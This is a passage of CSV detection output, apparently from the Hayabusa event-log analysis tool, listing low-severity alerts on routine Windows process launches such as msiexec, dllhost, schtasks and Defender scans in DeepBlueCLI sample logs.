0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:26.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:27.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:27.571 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:27.649 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:47.904 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:48.029 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:49.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:24.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:24.155 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:50.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:50.481 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:53.494 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:45:17.009 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:45:17.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:45:55.086 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:45:55.181 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:46:29.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:46:30.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:47:06.223 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:47:06.332 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:47:41.359 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:47:42.736 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:48:23.665 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:48:23.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 
23:48:46.838 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:48:47.001 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:49:56.148 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:49:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:49:59.727 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:03.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:03.998 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:11.414 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:11.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:23.151 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: 
IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:23.337 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:37.272 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:51:37.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:52:34.610 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:52:34.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E 
Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:53:22.275 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:53:22.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:53:23.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 00:52:11.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:19:44.532 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:19:44.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:19:44.692 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:21:44.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:27:33.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:34:52.733 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:34:54.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:35:15.773 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:16.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:29.507 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:29.601 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:40.667 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:35:46.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:36:24.719 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | 
User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:36:26.520 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 06:48:30.867 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 07:57:17.289 +09:00,IE10Win7,4688,low,,Suspicious Cmd 